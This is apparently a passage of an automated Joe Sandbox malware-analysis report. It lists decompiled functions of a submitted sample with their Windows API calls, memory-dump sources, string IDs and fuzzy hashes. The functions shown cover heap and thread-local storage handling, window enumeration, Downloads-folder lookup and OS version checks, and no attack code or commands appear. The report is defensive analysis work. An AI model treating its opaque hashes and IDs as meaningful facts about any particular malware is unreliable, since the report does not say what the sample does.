                                                                        • GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 0040AEF5
                                                                        • wcscpy.MSVCRT ref: 0040AF1B
                                                                        • wcscat.MSVCRT ref: 0040AF26
                                                                        • wcslen.MSVCRT ref: 0040AF2C
                                                                        • CoTaskMemFree.OLE32(?,00000000,00000000,?,007C9F70,00000000,00000000), ref: 0040AF3A
                                                                        • FreeLibrary.KERNEL32(00000000,?,?,?,00000009,0040373D,00000001,00000000,00000000,00000000,?,00000000,00000000,00000000,00404746,00000000), ref: 0040AF41
                                                                        • wcscat.MSVCRT ref: 0040AF59
                                                                        • wcslen.MSVCRT ref: 0040AF5F
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2054306384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2054290766.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054324926.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054338488.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054348855.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_da6ke5KbfB.jbxd
                                                                        Similarity
                                                                        • API ID: FreeLibrarywcscatwcslen$AddressAllocHeapLoadProcTaskValuewcscpy
                                                                        • String ID: Downloads\$SHGetKnownFolderPath$Shell32.DLL
                                                                        • API String ID: 1740785346-287042676
                                                                        • Opcode ID: 3b5950ac527df3ef7cda72db0df74ea4b6227c4cc24e67ecc582cb497ed06186
                                                                        • Instruction ID: 692465ff5638a5220195cb25a460cc83d5c0d74b8cd54d9d2378aa313f557f39
                                                                        • Opcode Fuzzy Hash: 3b5950ac527df3ef7cda72db0df74ea4b6227c4cc24e67ecc582cb497ed06186
                                                                        • Instruction Fuzzy Hash: 59210DB12483037AC121A7629C4AF6B3968DB51B95F10043FF505B51C1DABCC96195AF
                                                                        Function 00412722 Relevance: 19.6, APIs: 13, Instructions: 74memoryregistrythreadCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • TlsAlloc.KERNEL32(?,?,0040E6B8,0040E620,00000000,?,00402EF9,00000000,00000000,00000000,00000000,?,0040118D,00000000,00000000,00000000), ref: 00412732
                                                                        • InitializeCriticalSection.KERNEL32(004186E8,?,?,0040E6B8,0040E620,00000000,?,00402EF9,00000000,00000000,00000000,00000000,?,0040118D,00000000,00000000), ref: 0041273E
                                                                        • TlsGetValue.KERNEL32(?,?,0040E6B8,0040E620,00000000,?,00402EF9,00000000,00000000,00000000,00000000,?,0040118D,00000000,00000000,00000000), ref: 00412754
                                                                        • HeapAlloc.KERNEL32(00000008,00000014,?,?,0040E6B8,0040E620,00000000,?,00402EF9,00000000,00000000,00000000,00000000,?,0040118D,00000000), ref: 0041276E
                                                                        • EnterCriticalSection.KERNEL32(004186E8,?,?,0040E6B8,0040E620,00000000,?,00402EF9,00000000,00000000,00000000,00000000,?,0040118D,00000000,00000000), ref: 0041277F
                                                                        • LeaveCriticalSection.KERNEL32(004186E8,?,?,?,0040E6B8,0040E620,00000000,?,00402EF9,00000000,00000000,00000000,00000000,?,0040118D,00000000), ref: 0041279B
                                                                        • GetCurrentProcess.KERNEL32(00000000,00100000,00000000,00000000,?,?,?,0040E6B8,0040E620,00000000,?,00402EF9,00000000,00000000,00000000,00000000), ref: 004127B4
                                                                        • GetCurrentThread.KERNEL32 ref: 004127B7
                                                                        • GetCurrentProcess.KERNEL32(00000000,?,?,?,0040E6B8,0040E620,00000000,?,00402EF9,00000000,00000000,00000000,00000000,?,0040118D,00000000), ref: 004127BE
                                                                        • DuplicateHandle.KERNEL32(00000000,?,?,?,0040E6B8,0040E620,00000000,?,00402EF9,00000000,00000000,00000000,00000000,?,0040118D,00000000), ref: 004127C1
                                                                        • RegisterWaitForSingleObject.KERNEL32(0000000C,00000000,0041281A,00000000,000000FF,00000008), ref: 004127D7
                                                                        • TlsSetValue.KERNEL32(00000000,?,?,?,0040E6B8,0040E620,00000000,?,00402EF9,00000000,00000000,00000000,00000000,?,0040118D,00000000), ref: 004127E4
                                                                        • HeapAlloc.KERNEL32(00000000,0000000C,?,?,0040E6B8,0040E620,00000000,?,00402EF9,00000000,00000000,00000000,00000000,?,0040118D,00000000), ref: 004127F5
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2054306384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2054290766.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054324926.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054338488.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054348855.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_da6ke5KbfB.jbxd
                                                                        Similarity
                                                                        • API ID: AllocCriticalCurrentSection$HeapProcessValue$DuplicateEnterHandleInitializeLeaveObjectRegisterSingleThreadWait
                                                                        • String ID:
                                                                        • API String ID: 298514914-0
                                                                        • Opcode ID: 2e736260770be91d420535d1c957e5431970d5774848fb61a6feb3a44565c38a
                                                                        • Instruction ID: 7332ff317071e0a972604479ba3dd7ff9d073507a24f1d64326450f2c9127e0c
                                                                        • Opcode Fuzzy Hash: 2e736260770be91d420535d1c957e5431970d5774848fb61a6feb3a44565c38a
                                                                        • Instruction Fuzzy Hash: 36210770644301BFDB119F60ED88B967FB9FB08761F14C43AF505A62A1CBB49850CB68
                                                                        Function 00403221 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 176COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetWindowsDirectoryW.KERNEL32(00000000,00000800,00000000,00000800,00000000,00000000,?,00000000,00000000), ref: 004032AE
                                                                        • PathAddBackslashW.SHLWAPI(00000000,00000000,00000800,00000000,00000800,00000000,00000000,?,00000000,00000000), ref: 004032B7
                                                                        • GetSystemDirectoryW.KERNEL32(00000000,00000800), ref: 004033D7
                                                                        • PathAddBackslashW.SHLWAPI(00000000,00000000,00000800,00000000,00000800,00000000,00000000,00000000,00000800,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 004033E0
                                                                          • Part of subcall function 0040E560: RtlReAllocateHeap.NTDLL(007C0000,00000000,?,?), ref: 0040E5BC
                                                                        • PathAddBackslashW.SHLWAPI(00000000,00000000,sysnative,00000000,00000000,00000000,00000000,00000800,00000000,00000800,00000000,00000000,?,00000000,00000000), ref: 004032E7
                                                                          • Part of subcall function 0040E520: GetLastError.KERNEL32(00001000,00000000,00000000), ref: 0040E526
                                                                          • Part of subcall function 0040E520: TlsGetValue.KERNEL32(0000000D), ref: 0040E535
                                                                          • Part of subcall function 0040E520: SetLastError.KERNEL32(?), ref: 0040E54B
                                                                          • Part of subcall function 0040E560: TlsGetValue.KERNEL32(0000000D,00000000,00000000), ref: 0040E56C
                                                                          • Part of subcall function 0040E560: RtlAllocateHeap.NTDLL(007C0000,00000000,?), ref: 0040E599
                                                                        • GetSystemDirectoryW.KERNEL32(00000000,00000800), ref: 00403414
                                                                        • PathAddBackslashW.SHLWAPI(00000000,00000000,00000800,00000000,00000000,?,00000000,00000000), ref: 0040341D
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2054306384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2054290766.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054324926.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054338488.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054348855.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_da6ke5KbfB.jbxd
                                                                        Similarity
                                                                        • API ID: BackslashPath$Directory$AllocateErrorHeapLastSystemValue$Windows
                                                                        • String ID: sysnative
                                                                        • API String ID: 3406704365-821172135
                                                                        • Opcode ID: 06246fb3350c889958c456c83ddef363d069b28f08760247f4de7035fd8ff5d7
                                                                        • Instruction ID: e6855e8cc6b59ba75e59fbb34a632fbdfc5c60153de78cbca022c055a9fde60a
                                                                        • Opcode Fuzzy Hash: 06246fb3350c889958c456c83ddef363d069b28f08760247f4de7035fd8ff5d7
                                                                        • Instruction Fuzzy Hash: 83510A75118201BAD600BBB3DC82E3F66A9EB8075CF10CC3EB144751E2EA3DD9655A6E
                                                                        Function 0040E0C3 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 53librarysleeploaderCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • LoadLibraryW.KERNEL32(Kernel32.dll,00000000,00000000,00000000,00000004,00000000,0040DED5,0041867C,0040E062,00000000,FFFFFFED,00000200,76EC5E70,0040A4F6,FFFFFFED,00000010), ref: 0040E0D1
                                                                        • GetProcAddress.KERNEL32(00000000,InitOnceExecuteOnce), ref: 0040E0E6
                                                                        • FreeLibrary.KERNEL32(00000000,?,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000,00000000,00000000), ref: 0040E101
                                                                        • InterlockedCompareExchange.KERNEL32(00000000,00000001,00000000), ref: 0040E110
                                                                        • Sleep.KERNEL32(00000000,?,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000,00000000,00000000), ref: 0040E122
                                                                        • InterlockedExchange.KERNEL32(00000000,00000002), ref: 0040E135
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2054306384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2054290766.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054324926.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054338488.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054348855.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_da6ke5KbfB.jbxd
                                                                        Similarity
                                                                        • API ID: ExchangeInterlockedLibrary$AddressCompareFreeLoadProcSleep
                                                                        • String ID: InitOnceExecuteOnce$Kernel32.dll
                                                                        • API String ID: 2918862794-1339284965
                                                                        • Opcode ID: 5ce0d2485c1bb4decbbcb922162a80cd5c7d15fe9eeb9708d5254b12b909fa63
                                                                        • Instruction ID: f1debd77009d833240bff916e076c3bff8506a5db62120b34ae0b3aef6ef2b9b
                                                                        • Opcode Fuzzy Hash: 5ce0d2485c1bb4decbbcb922162a80cd5c7d15fe9eeb9708d5254b12b909fa63
                                                                        • Instruction Fuzzy Hash: 3001D431244214FBD6201FA2DC4DFEB7B79EB45B52F10883AF501B51C0EAB85D21C66D
                                                                        Function 00409507 Relevance: 12.0, APIs: 8, Instructions: 50threadwindowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetWindowThreadProcessId.USER32(?,00000000), ref: 00409511
                                                                        • GetCurrentThreadId.KERNEL32 ref: 0040951F
                                                                        • IsWindowVisible.USER32(?), ref: 00409526
                                                                          • Part of subcall function 0040E1F2: HeapAlloc.KERNEL32(00000008,00000000,0040DA6C,00418670,00000014,?,?,?,?,00409674,00000010,00000000,00000000,00401071,00000000,00001000), ref: 0040E1FE
                                                                        • GetCurrentThreadId.KERNEL32 ref: 00409543
                                                                        • GetWindowLongW.USER32(?,000000EC), ref: 00409550
                                                                        • GetForegroundWindow.USER32 ref: 0040955E
                                                                        • IsWindowEnabled.USER32(?), ref: 00409569
                                                                        • EnableWindow.USER32(?,00000000), ref: 00409579
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2054306384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2054290766.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054324926.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054338488.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054348855.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_da6ke5KbfB.jbxd
                                                                        Similarity
                                                                        • API ID: Window$Thread$Current$AllocEnableEnabledForegroundHeapLongProcessVisible
                                                                        • String ID:
                                                                        • API String ID: 3383493704-0
                                                                        • Opcode ID: 68a633d90a34132dfb5e2fdbc66a21f5e6654eddc9afd13cb677bbd48b54e552
                                                                        • Instruction ID: 39f81579f69f96c849a8792b8e2bccb0372a8aae8c011f207204c0ba92c0e649
                                                                        • Opcode Fuzzy Hash: 68a633d90a34132dfb5e2fdbc66a21f5e6654eddc9afd13cb677bbd48b54e552
                                                                        • Instruction Fuzzy Hash: 2E01DD321083016FD3219B7ADC88AABBBF8AF51760B04803EF446D3291D7748C40C66D
                                                                        Function 00408EB4 Relevance: 10.6, APIs: 7, Instructions: 54memoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • DestroyWindow.USER32(?), ref: 00408EED
                                                                        • GetWindowLongW.USER32(?,000000EB), ref: 00408EFC
                                                                        • GetWindowTextLengthW.USER32 ref: 00408F0A
                                                                        • HeapAlloc.KERNEL32(00000000), ref: 00408F1F
                                                                        • GetWindowTextW.USER32(00000000,00000001), ref: 00408F2F
                                                                        • DestroyWindow.USER32(?), ref: 00408F3D
                                                                        • UnregisterClassW.USER32 ref: 00408F53
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2054306384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2054290766.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054324926.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054338488.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054348855.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_da6ke5KbfB.jbxd
                                                                        Similarity
                                                                        • API ID: Window$DestroyText$AllocClassHeapLengthLongUnregister
                                                                        • String ID:
                                                                        • API String ID: 2895088630-0
                                                                        • Opcode ID: 95d800774705508cbc5b0801488b835211eb90fc9c6ab37156a63b4f6fedfd03
                                                                        • Instruction ID: 1940c3daec6268f5e5453f2abd6c11195bb238337c9a47dace4bef07d760dbb1
                                                                        • Opcode Fuzzy Hash: 95d800774705508cbc5b0801488b835211eb90fc9c6ab37156a63b4f6fedfd03
                                                                        • Instruction Fuzzy Hash: 9011FA3110821AFFCB115F64ED4C9E63F76EB18365B10C17AF845A2AB0CF359951EB58
                                                                        Function 00409588 Relevance: 9.1, APIs: 6, Instructions: 68threadCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • EnumWindows.USER32(00409507,?), ref: 0040959B
                                                                        • GetCurrentThreadId.KERNEL32 ref: 004095B3
                                                                        • SetWindowPos.USER32(?,000000FE,00000000,00000000,00000000,00000000,00000003,?,?,?,?,?), ref: 004095CF
                                                                        • GetCurrentThreadId.KERNEL32 ref: 004095EF
                                                                        • EnableWindow.USER32(?,00000001), ref: 00409605
                                                                        • SetWindowPos.USER32(?,000000FF,00000000,00000000,00000000,00000000,00000003,?,?,?,?,?), ref: 0040961C
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2054306384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2054290766.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054324926.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054338488.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054348855.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_da6ke5KbfB.jbxd
                                                                        Similarity
                                                                        • API ID: Window$CurrentThread$EnableEnumWindows
                                                                        • String ID:
                                                                        • API String ID: 2527101397-0
                                                                        • Opcode ID: 63874de7abb22210dce27e7498091370d04ccb8537cec92ca55daa4cf010ce04
                                                                        • Instruction ID: 1b506e7c949c81e82e84a7d7bfb29e48a0d3001387cd43cbe5fa1ceb5ac7c4b4
                                                                        • Opcode Fuzzy Hash: 63874de7abb22210dce27e7498091370d04ccb8537cec92ca55daa4cf010ce04
                                                                        • Instruction Fuzzy Hash: D211D032149741BBD7324F16EC48F57BBB9EB81B20F148A3EF065226E1DB766C44CA18
                                                                        Function 0040D9D3 Relevance: 9.1, APIs: 6, Instructions: 66memoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • TlsAlloc.KERNEL32(?,?,?,?,00409674,00000010,00000000,00000000,00401071,00000000,00001000,00000000,00000000), ref: 0040D9F8
                                                                        • HeapAlloc.KERNEL32(00000008,00000000,?,?,?,?,00409674,00000010,00000000,00000000,00401071,00000000,00001000,00000000,00000000), ref: 0040DA0C
                                                                        • TlsSetValue.KERNEL32(00000000,?,?,?,?,00409674,00000010,00000000,00000000,00401071,00000000,00001000,00000000,00000000), ref: 0040DA19
                                                                        • TlsGetValue.KERNEL32(00000010,?,?,?,?,00409674,00000010,00000000,00000000,00401071,00000000,00001000,00000000,00000000), ref: 0040DA30
                                                                        • HeapReAlloc.KERNEL32(00000008,00000000,?,?,?,?,00409674,00000010,00000000,00000000,00401071,00000000,00001000,00000000,00000000), ref: 0040DA3F
                                                                        • TlsSetValue.KERNEL32(00000000,?,?,?,?,00409674,00000010,00000000,00000000,00401071,00000000,00001000,00000000,00000000), ref: 0040DA4E
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2054306384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2054290766.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054324926.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054338488.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054348855.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_da6ke5KbfB.jbxd
                                                                        Similarity
                                                                        • API ID: AllocValue$Heap
                                                                        • String ID:
                                                                        • API String ID: 2472784365-0
                                                                        • Opcode ID: 7f6b70932fc1a08cda45a5a13933a08f33854a1b42fa358b63a86d14e57a1294
                                                                        • Instruction ID: 2e0cfeba47cec0f6b91efb2e93d625c98a83c07df354da5318bce0fb1280086a
                                                                        • Opcode Fuzzy Hash: 7f6b70932fc1a08cda45a5a13933a08f33854a1b42fa358b63a86d14e57a1294
                                                                        • Instruction Fuzzy Hash: 1C118676A45310AFD7109FA5EC44AA67FA9EB18760B05813EF904D7370DA359C44CBAC
                                                                        Function 004126A4 Relevance: 9.0, APIs: 6, Instructions: 45memoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • UnregisterWait.KERNEL32(?), ref: 004126AE
                                                                        • CloseHandle.KERNEL32(?,?,?,?,0041282A,?), ref: 004126B7
                                                                        • EnterCriticalSection.KERNEL32(004186E8,?,?,?,0041282A,?), ref: 004126C3
                                                                        • LeaveCriticalSection.KERNEL32(004186E8,?,?,?,0041282A,?), ref: 004126E8
                                                                        • HeapFree.KERNEL32(00000000,00000000,?,?,?,0041282A,?), ref: 00412706
                                                                        • HeapFree.KERNEL32(?,?,?,?,?,0041282A,?), ref: 00412718
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2054306384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2054290766.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054324926.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054338488.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054348855.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_da6ke5KbfB.jbxd
                                                                        Similarity
                                                                        • API ID: CriticalFreeHeapSection$CloseEnterHandleLeaveUnregisterWait
                                                                        • String ID:
                                                                        • API String ID: 4204870694-0
                                                                        • Opcode ID: f70a7c029a070c226780d23f7e43a7120967b39c5434bc4d35a475d06415ef98
                                                                        • Instruction ID: 8ad69fc92b526a08bfe7472bb61da84b570d2b31100e81d3d28f3db860eb322d
                                                                        • Opcode Fuzzy Hash: f70a7c029a070c226780d23f7e43a7120967b39c5434bc4d35a475d06415ef98
                                                                        • Instruction Fuzzy Hash: ED014874202605BFC7159F11ED88ADABB79FF49352310843EE51AC6A60CB35A861CBA8
                                                                        Function 004057F0 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 118COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • wcsncmp.MSVCRT ref: 00405853
                                                                        • memmove.MSVCRT(00000000,00000000,?,00000000,00000000,?,?,-0000012C,?,?,00402252,00000000,00000002,00000000,00000000,00417024), ref: 004058E1
                                                                        • wcsncpy.MSVCRT ref: 004058F9
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2054306384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2054290766.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054324926.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054338488.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054348855.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_da6ke5KbfB.jbxd
                                                                        Similarity
                                                                        • API ID: memmovewcsncmpwcsncpy
                                                                        • String ID: $0A$$0A
                                                                        • API String ID: 1452150355-167650565
                                                                        • Opcode ID: 14318413d9adc2e2b942005046f5369366b6e76739e1c09bf8bc34821c1b3a51
                                                                        • Instruction ID: 832c062924e7bef47b33d77ba9c88e4f4304e1b7f9fac3bbf8cf3561daacd64f
                                                                        • Opcode Fuzzy Hash: 14318413d9adc2e2b942005046f5369366b6e76739e1c09bf8bc34821c1b3a51
                                                                        • Instruction Fuzzy Hash: 7131C336904B058BC720BA55888057B77A8EE84384F14893EEC8537382EB799D61CBA9
                                                                        Function 0040552C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29libraryloaderCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • memset.MSVCRT ref: 0040553B
                                                                        • GetModuleHandleW.KERNEL32(ntdll.dll,?,?,00000000), ref: 0040554A
                                                                        • GetProcAddress.KERNEL32(00000000,RtlGetVersion), ref: 0040555A
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2054306384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2054290766.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054324926.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054338488.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054348855.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_da6ke5KbfB.jbxd
                                                                        Similarity
                                                                        • API ID: AddressHandleModuleProcmemset
                                                                        • String ID: RtlGetVersion$ntdll.dll
                                                                        • API String ID: 3137504439-1489217083
                                                                        • Opcode ID: 979e6798394419a5d8feb081e21a74f9c3e25225fd5f8554349b136b21278e81
                                                                        • Instruction ID: c27d50cfc24873b946f5b5a14a9105dc5d991450749eb0f504377b4d26b5710e
                                                                        • Opcode Fuzzy Hash: 979e6798394419a5d8feb081e21a74f9c3e25225fd5f8554349b136b21278e81
                                                                        • Instruction Fuzzy Hash: 14E0DF31B8461576C6202F75AC0AFCB2AEDCFC6B41B18043AF101F31D5DA38CA418ABD
                                                                        Function 0040A6C3 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 80memoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • wcslen.MSVCRT ref: 0040A72B
                                                                        • HeapAlloc.KERNEL32(00000000,00000000,00000000,00000001,?,?,?,00000000,0040A54C,?,?,00000000,?,?,00403C0E), ref: 0040A741
                                                                        • wcscpy.MSVCRT ref: 0040A74C
                                                                        • memset.MSVCRT ref: 0040A77A
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2054306384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2054290766.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054324926.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054338488.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054348855.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_da6ke5KbfB.jbxd
                                                                        Similarity
                                                                        • API ID: AllocHeapmemsetwcscpywcslen
                                                                        • String ID: $0A
                                                                        • API String ID: 1807340688-513306843
                                                                        • Opcode ID: 0446004259e7087f80f5e9692535c9a3ff9e7738c9dd9ea03abb58d6e7266719
                                                                        • Instruction ID: e32262bd00c92b68ef8260e1fb7dc13a688965226c4dfc8bf1af71259570edab
                                                                        • Opcode Fuzzy Hash: 0446004259e7087f80f5e9692535c9a3ff9e7738c9dd9ea03abb58d6e7266719
                                                                        • Instruction Fuzzy Hash: 3C214872100B01AFC321AF159881B6BB7F9EF88314F14893FF58563691CB79E8258B1A
                                                                        Function 0040A460 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 73memoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 0040A54F: HeapFree.KERNEL32(00000000,?,?,00000000,00000200,?,?,0040A46F,00000200,?,?,?,004010C3,00000004,00000015,00000000), ref: 0040A57A
                                                                          • Part of subcall function 0040A54F: HeapFree.KERNEL32(00000000,?,?,?,0040A46F,00000200,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5), ref: 0040A586
                                                                          • Part of subcall function 0040A54F: HeapFree.KERNEL32(00000000,?,?,?,?,0040A46F,00000200,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200), ref: 0040A59A
                                                                          • Part of subcall function 0040A54F: HeapFree.KERNEL32(00000000,00000000,?,?,0040A46F,00000200,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5), ref: 0040A5B0
                                                                        • HeapAlloc.KERNEL32(00000000,0000003C,00000200,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000,00000000), ref: 0040A47F
                                                                        • HeapAlloc.KERNEL32(00000008,00000015,?,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000,00000000), ref: 0040A4A5
                                                                        • HeapAlloc.KERNEL32(00000008,FFFFFFED,FFFFFFED,00000010,00010000,00000004,00000200,?,?,?,?,004010C3,00000004,00000015,00000000,00000200), ref: 0040A502
                                                                        • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000,00000000), ref: 0040A51C
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2054306384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2054290766.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054324926.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
